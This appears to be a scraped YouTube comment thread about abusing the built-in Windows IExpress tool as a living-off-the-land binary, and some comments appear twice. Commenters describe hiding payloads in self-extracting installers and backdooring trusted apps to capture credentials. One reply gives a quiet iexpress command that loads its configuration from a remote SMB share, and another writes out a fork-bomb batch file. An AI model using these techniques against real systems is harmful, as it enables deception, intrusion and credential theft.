I use to use IExpress back on Windows XP because I didn't know how to write a binder. Wait until you find out WPF applications on web pages to bypass security. Not as easy as it use to be with IE but still there. Also use a MSI file with resilience to re-download when the file is removed. Old as time, but works even today.
Reminds me of doing naughty things with winrar back in the day. You could create a winrar executable that would function like a normal zip file but at the end of extraction you could specify an executable to run. So you could essentially give the downloader what they were looking for but sneak in a little surprise with it.
"open and run this EXE on your computer, I promise it's not malware!" Hahaha John, one of your last videos showcased people watching UA-cam tutorials and getting compromised by following those instructions! Kidding aside, I love the content, keep up the good work!
@@nyandesu9165lol not really no i had an imac as a kid not a windows. ive just never read about this particular binary. ill usually look at windir for dll sideloading and stuff by checking missing dll’s in procmon or wtv. havent explored a lot of lolbins. :D
Finally the 40+min. Videos are back. I missed them. I would love more stuff like the 'Throwback Network' Videos. And no offence, but the 10-15min. Videos with 3min. Advertisements in the middle got kinda boring over the time. Lov ya, take care.❤
Why? Because you are only vulnerable to Linux viruses? You aren't safe just because you use Linux. Running things willy nilly is bad no matter the OS. The strongest anti virus is a smart user, but even they aren't infallible.
Probably not, as it’s built in on Windows. But if you use it to execute some generic and known malicious payload like from Metasploit, it will most likely block that.
Seems to me the run command could be a nice SMB command to a machine you've got a listener on to grab creds and you're off to the races if you get the right person :) BTW John have you seen some of the cute "shortcut" files people are trying to distribute of late that are malicious? Shady!
Why would it be used specifically by script kids? People like you seems to think real hackers are only using their own zero-days written in assembly and they're connecting to the internet by using a hacked norwegian satellites etc... lol
When you were running the .exe files, I assumed you were in Admin role, I am curious what would display on the UAC for a none Admin role? Would it have Microsoft on there? I noticed you showed it was unverified, but if it still says Microsoft, I am sure that is enough to fool most people? Also, I was not sure were the connection to Internet Explorer came from in the Sigcheck details?
Okay serious question. I can't test it on my own machine, because it refused to build a cabinet, threw an error. If this was generated on a different PC and downloaded from the internet, it would still have the mark of the web though, right? And windows would at least try to prevent me from running it? Or is the point to generate the file on the infected machine itself? But then why use the malware program to create an executable that runs something, if it's already running malware? I'm not very familiar with LOLBAS or the like, but I'm curious. What exactly is the attack angle that Iexpress provides? (also silly me writing a comment mid-video, might get answered later)
Is it just obfuscation for deeper layers of malware? Or does it allow you to run programs in admin mode? That AdminQuiet mode seemed interesting, can that be used to level up your permissions?
this thing basically just zip your files and ship it as an exe. literally any antivirus would detect it and see right through it, and only skids would use it.
Is the error you are getting referring to being unable to open the Report file? If that's the case, try running iexpress.exe from the same working directory that you are writing the EXE or CAB file to -- I've seen it be finicky with that. You are right that any file downloaded would still have Mark of the Web (unless you wrapped it inside of a container file like an ISO or others, like discussed in the previous MOTW video). As you mentioned, you certainly could generate the file on the same target machine you already have initial access on, and that can still be a valuable angle to either setup other persistence mechanisms, or craft one of those social engineering ploys like a "backdoored" regular and normal application, to trick an end user into willingly running a program as an elevated user, or entering credentials that otherwise weren't on the machine. Think of a tampered program sitting on the desktop that the user usually runs, or something pinned on their taskbar or in their start menu that anyone would just intentionally click on And you are right that it can be extra obfuscation for deeper layers of malware of malware just as well, it can just as easily be used for the next stage of an attack chain, again to obscure code execution. In regards to iexpress being "just an installer to run what you specify, as any installer would", keep in mind that CompressionType QUANTUM doesn't even need to have it invoke as an installer since you are simply running the command regularly and not it's generated EXE... and there is nothing stopping you from providing the file with a remote location by a SMB network share or UNC path (iexpress.exe /n /q \\192.168.111.179\share emote.SED), so it doesn't need to be on disk or depend on another file artifact.
iexpress as a trojan is like the old comics. where the CIA use old soviet gear to perform surveillance. The old soviet gear being giant satellite dishes with giant head phones and antenna.
Meow! Now, Everyone Is A Suspect! This Is The Back Door We All Suspected To Exist On A Global Scale, But Backwards! Now, If Each Binary Is A Lock, Then We Have Multiple Locks To Complete A Series. Then Technically Each Series Has A "Master" Key. So We Will Have Different Series Relating To Different Topics, Giving Us A Set Of "Grand Master" Keys. A Set Could Be 10 Master Keys, Which Would Be Considered Too Many! Why Do I SENSE, Somewhere In There, A "GRAND-GRAND MASTER" Key!? In All Things Considered, Human Nature Is Full Of Self Gratification Shortcuts Not To Repeat Insanity! Awesome Report On This One, John! YOU Gave Me Another Next TEN YEARS Of To-Do Fulfillment Duties, Then Be Outdated! LOL!
this fixes a problem which is not there, you understand? there are 1000s ways of bundling your software, but like some other comments said: the avs can see right thru it (which is logic because its not obfuscated...
Yo mate, one of my machines just got hacked. Other than Twitter, how can I send you the logs and artifacts? It might be worth looking into, since you're into that stuff.
i mean you cam use whatever you want for cnc lol, id rather use something that wont get flagged in memory or wtv like a dotnet agent, then use a beacon or meterpreter for advanced control after i have persistence
Hey can someone give me a idea of what i should price my mobile app as?? Main purpose/function is to be able to hash files and verify files on mobile already made it and works well just dont know what to price it at was thinking £2? Dont want to open source it got bills to pay, any advice or idea's are welcome
@@seancrouch why can’t I do that on my PC? My phone is basically for calling and texting people and sometimes watching UA-cam/surfing the web. If I were going to use my phone like a computer, I’d just install a Linux distro on it and have everything I could ever want for free.
Not really living off the land when I have to then social engineer someone to install the file or run it from within a service ive already exploited, better ways to get this done, nice way to make an installer though i guess...
Gosh this is like that WinRAR or WinZip self-executative zip or rar files. Where it auto-extracts and runs the applications you want to run (either making your own version of an installation of a software or this) Or those stuff like NSIS or InstallShield stuff I also used abit
@@not_user11 I use windows stuff like this all the time. Pretty much anything old, or CLI will run with WINE. Hell, I’d say a good 80% of Windows software, even a lot of newer stuff, runs pretty well with WINE. This will run flawlessly.
This is kind of stupid. Any installer maker can do this, and there are many easier to use and abuse. It is not in the lust because AN INSTALLER MAKER is known to be able to do this, it is not a design flaw or weakness.
This isn't stupid. It comes pre-installed even in the latest version of windows. It can be used for living off the land. Any installer won't be present by default in a windows device that you gained access to but this one is native to windows.
@@anik2443 it does not matter that comes with windows. Why would it? Is not like YOU are making your own malware to infect yourself. Any bad actor can use whatever dont have to be pre-installed. That is why it is stupud
@@VaracolacidVesci do you know nothing about post exploitation? It's for remaining undetected by using tools available natively in the system. Go Research about it
@@anik2443 hahahaha ofc not! You are trying to sound fancy but clearly you are just another asshole in the internet. it's not like the av engines or any other software would say OH it is made by the system tool, let's allow it!. hahaha how stupid can you be
@@anik2443 hahahaha OFC NOT! There is nothing special about it being on the system, is not like the exe would have anything special about it. is not like the AV engines or any other protection would say, OH it is made by the system tool let's allow it regardless, hahahaha HOW STUPID CAN YOU BE?
i remember pranking my friends with a .bat file (named hello.bat) containing: start hello.bat call hello.bat very funny, unless you have unsaved work (unfortunately it won't work if you don't have access to "start" like on school computers, but you can still call other programs using "call", it's just not exponential)
I use to use IExpress back on Windows XP because I didn't know how to write a binder. Wait until you find out WPF applications on web pages to bypass security. Not as easy as it use to be with IE but still there. Also use a MSI file with resilience to re-download when the file is removed. Old as time, but works even today.
Reminds me of doing naughty things with winrar back in the day. You could create a winrar executable that would function like a normal zip file but at the end of extraction you could specify an executable to run. So you could essentially give the downloader what they were looking for but sneak in a little surprise with it.
Still being used till today
With this I think I'm not just "living off the land", your computer is my Dukedom
"open and run this EXE on your computer, I promise it's not malware!" Hahaha John, one of your last videos showcased people watching UA-cam tutorials and getting compromised by following those instructions! Kidding aside, I love the content, keep up the good work!
literally never heard of it, great video.
wow, you must have had a sad childhood if you never went to play in system32
@@nyandesu9165lol not really no i had an imac as a kid not a windows. ive just never read about this particular binary. ill usually look at windir for dll sideloading and stuff by checking missing dll’s in procmon or wtv. havent explored a lot of lolbins. :D
Finally the 40+min. Videos are back. I missed them. I would love more stuff like the 'Throwback Network' Videos. And no offence, but the 10-15min. Videos with 3min. Advertisements in the middle got kinda boring over the time. Lov ya, take care.❤
How do people even find this stuff! At a addicted learner at this genre of IT, this is gold!
I ❤ living in QUANTUM time, thanks to Microsoft (and John & the researchers)
This is golden info😊
This is some very good information, mister
You have my attention for rest of my life
This is mental, I will never trust an exe ever again 🤣 Thank goodness I use Linux as a daily OS
Why? Because you are only vulnerable to Linux viruses? You aren't safe just because you use Linux. Running things willy nilly is bad no matter the OS. The strongest anti virus is a smart user, but even they aren't infallible.
linux isn't immune to viruses also you dont need to mention that you use linux everywhere
What an outro 😂 with the loop of calc
Love the early morning uploads! At least in California
it seems like a great tool to keep in the windows install... if you are the NSA 😲
After I saw you can automate it, without any windows: definitely should be on the list !
Would antivirus catch the iexpress instance though? Like when you first call iexpress, would antivirus throw a warning?
Probably not, as it’s built in on Windows. But if you use it to execute some generic and known malicious payload like from Metasploit, it will most likely block that.
very good information
you can put the command in the gui too, its not stopping you (13:05)
Cheers.
Seems to me the run command could be a nice SMB command to a machine you've got a listener on to grab creds and you're off to the races if you get the right person :)
BTW John have you seen some of the cute "shortcut" files people are trying to distribute of late that are malicious? Shady!
hm,that might be a problem
wtf John, stop please, you makin' me really anxious of everything connected to internet. :D
0:13 that's what they want you to think
From below 3 which one is efficient
AWUS036ACM
AWUS036ACH
AWUS036NHA
According to you?
Sir, Would you make videos about scammers please 🙏
@@romanemul1 Am I requested you? or you are a scammer?
for "hackers", specifically the skids lmao
Well said 😂
well, lolbins not really only being used by skiddies, several bigger threats have been using lolbins like certutil or installutils.
@@88tx well guess any good pen tester would use anything at their disposal even if its easy no reason to work twice the amount with the same outcome🙂
I have seen sth like that with .bat
Why would it be used specifically by script kids?
People like you seems to think real hackers are only using their own zero-days written in assembly and they're connecting to the internet by using a hacked norwegian satellites etc... lol
When you were running the .exe files, I assumed you were in Admin role, I am curious what would display on the UAC for a none Admin role?
Would it have Microsoft on there? I noticed you showed it was unverified, but if it still says Microsoft, I am sure that is enough to fool most people?
Also, I was not sure were the connection to Internet Explorer came from in the Sigcheck details?
Rebuilding Installer.exe from Installer.SED - Can the other way around be done too?
Just curious
Damn it John. Stop burning my unknown lolbins!
100 percent of kids would do this on every pc in schools back in my day looooool if only we had youtube haha
You can right click on an exe and choose extract.
Definitely. After watching the video, certainly! :D
28:05 Tags, also known as "greater than less than symbol waka waka alligator faces" 🐊🐊
Okay serious question. I can't test it on my own machine, because it refused to build a cabinet, threw an error. If this was generated on a different PC and downloaded from the internet, it would still have the mark of the web though, right? And windows would at least try to prevent me from running it? Or is the point to generate the file on the infected machine itself? But then why use the malware program to create an executable that runs something, if it's already running malware? I'm not very familiar with LOLBAS or the like, but I'm curious. What exactly is the attack angle that Iexpress provides? (also silly me writing a comment mid-video, might get answered later)
Is it just obfuscation for deeper layers of malware? Or does it allow you to run programs in admin mode? That AdminQuiet mode seemed interesting, can that be used to level up your permissions?
this thing basically just zip your files and ship it as an exe. literally any antivirus would detect it and see right through it, and only skids would use it.
Is the error you are getting referring to being unable to open the Report file? If that's the case, try running iexpress.exe from the same working directory that you are writing the EXE or CAB file to -- I've seen it be finicky with that. You are right that any file downloaded would still have Mark of the Web (unless you wrapped it inside of a container file like an ISO or others, like discussed in the previous MOTW video). As you mentioned, you certainly could generate the file on the same target machine you already have initial access on, and that can still be a valuable angle to either setup other persistence mechanisms, or craft one of those social engineering ploys like a "backdoored" regular and normal application, to trick an end user into willingly running a program as an elevated user, or entering credentials that otherwise weren't on the machine. Think of a tampered program sitting on the desktop that the user usually runs, or something pinned on their taskbar or in their start menu that anyone would just intentionally click on And you are right that it can be extra obfuscation for deeper layers of malware of malware just as well, it can just as easily be used for the next stage of an attack chain, again to obscure code execution. In regards to iexpress being "just an installer to run what you specify, as any installer would", keep in mind that CompressionType QUANTUM doesn't even need to have it invoke as an installer since you are simply running the command regularly and not it's generated EXE... and there is nothing stopping you from providing the file with a remote location by a SMB network share or UNC path (iexpress.exe /n /q \\192.168.111.179\share
emote.SED), so it doesn't need to be on disk or depend on another file artifact.
@@_JohnHammond Just tried it from the same folder, yeah that works. Thanks for the explanation, yeah that all makes sense. Fascinating
iexpress as a trojan is like the old comics. where the CIA use old soviet gear to perform surveillance. The old soviet gear being giant satellite dishes with giant head phones and antenna.
Meow! Now, Everyone Is A Suspect! This Is The Back Door We All Suspected To Exist On A Global Scale, But Backwards! Now, If Each Binary Is A Lock, Then We Have Multiple Locks To Complete A Series. Then Technically Each Series Has A "Master" Key. So We Will Have Different Series Relating To Different Topics, Giving Us A Set Of "Grand Master" Keys. A Set Could Be 10 Master Keys, Which Would Be Considered Too Many! Why Do I SENSE, Somewhere In There, A "GRAND-GRAND MASTER" Key!? In All Things Considered, Human Nature Is Full Of Self Gratification Shortcuts Not To Repeat Insanity! Awesome Report On This One, John! YOU Gave Me Another Next TEN YEARS Of To-Do Fulfillment Duties, Then Be Outdated! LOL!
Go easy on the shift key bud. 😂
maybe run net user add commands on secondary options ? hefty way to have sneaked in local admin accounts ?
I wonder how to block that as part of Windows PC hardening🤔🤔🤔???
honestly this only feels useful for a script kiddy kind of thing because all of this is already trivial for actual developers, e.g. via costura
can it bypass AV by putting first Exclusion to C:\ drive then executing powershell base64 memory Ransomware
no
Give up kid
This made me laugh out loud, Ty kid
it doesn't really work like that 😅
this fixes a problem which is not there, you understand? there are 1000s ways of bundling your software, but like some other comments said: the avs can see right thru it (which is logic because its not obfuscated...
Yo mate, one of my machines just got hacked.
Other than Twitter, how can I send you the logs and artifacts?
It might be worth looking into, since you're into that stuff.
Nevermind. This video has what your site doesn't: the full list of links 😂
hang on, you sta5rted a bomb on your actual computer instead of a virtual machine?
your living on the edge here!
The duke of windows nuking
I would like to see this with metasploit in action but yt will not allow it right
youtube would allow it, it just wouldn't be very interesting
i mean you cam use whatever you want for cnc lol, id rather use something that wont get flagged in memory or wtv like a dotnet agent, then use a beacon or meterpreter for advanced control after i have persistence
Hey can someone give me a idea of what i should price my mobile app as?? Main purpose/function is to be able to hash files and verify files on mobile already made it and works well just dont know what to price it at was thinking £2? Dont want to open source it got bills to pay, any advice or idea's are welcome
@@seancrouch why can’t I do that on my PC? My phone is basically for calling and texting people and sometimes watching UA-cam/surfing the web. If I were going to use my phone like a computer, I’d just install a Linux distro on it and have everything I could ever want for free.
Using this "SED" technique. lol
Not really living off the land when I have to then social engineer someone to install the file or run it from within a service ive already exploited, better ways to get this done, nice way to make an installer though i guess...
Windows defender instantly detected my test file lol
Gosh this is like that WinRAR or WinZip self-executative zip or rar files. Where it auto-extracts and runs the applications you want to run (either making your own version of an installation of a software or this)
Or those stuff like NSIS or InstallShield stuff I also used abit
Sup
The wikipedia page on this is interesting. But I am trying to figure out - why does it exist? But yes, it belongs in the lolbin category.
Iexpress something the RAT kiddies used to love using to pack up the nasty RAT's. Not seen this in time surprised its not in the LOTL files.
I wonder if u can prompt a user to run on admin privilege
you can, just like you can with any exe
@@yukiqt yeah but the installer doesnt specifically ask for admin privilege
@@k4m1kazep1lot4 if you're asking if it can bypass uac, it can't
Hi
Bypass antivirus whith iexplorer encode payload en opera example
oh jeez, ofc thats a lolbin
yikes
I can't try it out because my pc doesn't run windows
poor little linux user
Runs in WINE on linux.
@@_Yassir_ in the words of OTW, “if you don’t know Linux, you’re not a hacker.”
@@not_user11 I use windows stuff like this all the time. Pretty much anything old, or CLI will run with WINE. Hell, I’d say a good 80% of Windows software, even a lot of newer stuff, runs pretty well with WINE. This will run flawlessly.
41 minutes of yapping just to tell us that an installer can run whatever you tell it to.
You may be right about that but remember, you aren't entitled to anything and he doesn't own us anything.
domt be a dick bud
he literally jumped right in explained what the tool was
@@MygenteTV🤓
@HyBlock spoken like someone who doesn't understand how lolbin attacks work
Bro who you yelling at tho
He's just passionate about the subject. He doesn't yell half as much as some youtubers do.
@@Cyba_IT I'm just trying to stay chill and learn about IT not have lunch with Samuel L Jackson 😆😆😆
@@looweegee252 😂😂😂
don't worry soon microsoft will get rid all old ~[control-panel] and other vintage [features] and stuff in windows, so u don't mess around :D
Update: they are not getting rid of it
Yup just like those .pif files too.
bro
basically first
lol classic
omg
first
Bb
twf no secret end-of-video keyword 😞
second
First 🥇
This is kind of stupid.
Any installer maker can do this, and there are many easier to use and abuse. It is not in the lust because AN INSTALLER MAKER is known to be able to do this, it is not a design flaw or weakness.
This isn't stupid. It comes pre-installed even in the latest version of windows. It can be used for living off the land. Any installer won't be present by default in a windows device that you gained access to but this one is native to windows.
@@anik2443 it does not matter that comes with windows. Why would it?
Is not like YOU are making your own malware to infect yourself.
Any bad actor can use whatever dont have to be pre-installed. That is why it is stupud
@@VaracolacidVesci do you know nothing about post exploitation? It's for remaining undetected by using tools available natively in the system. Go Research about it
@@anik2443 hahahaha ofc not! You are trying to sound fancy but clearly you are just another asshole in the internet.
it's not like the av engines or any other software would say OH it is made by the system tool, let's allow it!.
hahaha how stupid can you be
@@anik2443 hahahaha OFC NOT!
There is nothing special about it being on the system, is not like the exe would have anything special about it. is not like the AV engines or any other protection would say, OH it is made by the system tool let's allow it regardless, hahahaha HOW STUPID CAN YOU BE?
Bring game hacking *🎉❤
First 😂
i remember pranking my friends with a .bat file (named hello.bat) containing:
start hello.bat
call hello.bat
very funny, unless you have unsaved work
(unfortunately it won't work if you don't have access to "start" like on school computers, but you can still call other programs using "call", it's just not exponential)
Instructions unclear. Typing does nothing on my Windows 95 computer's start menu.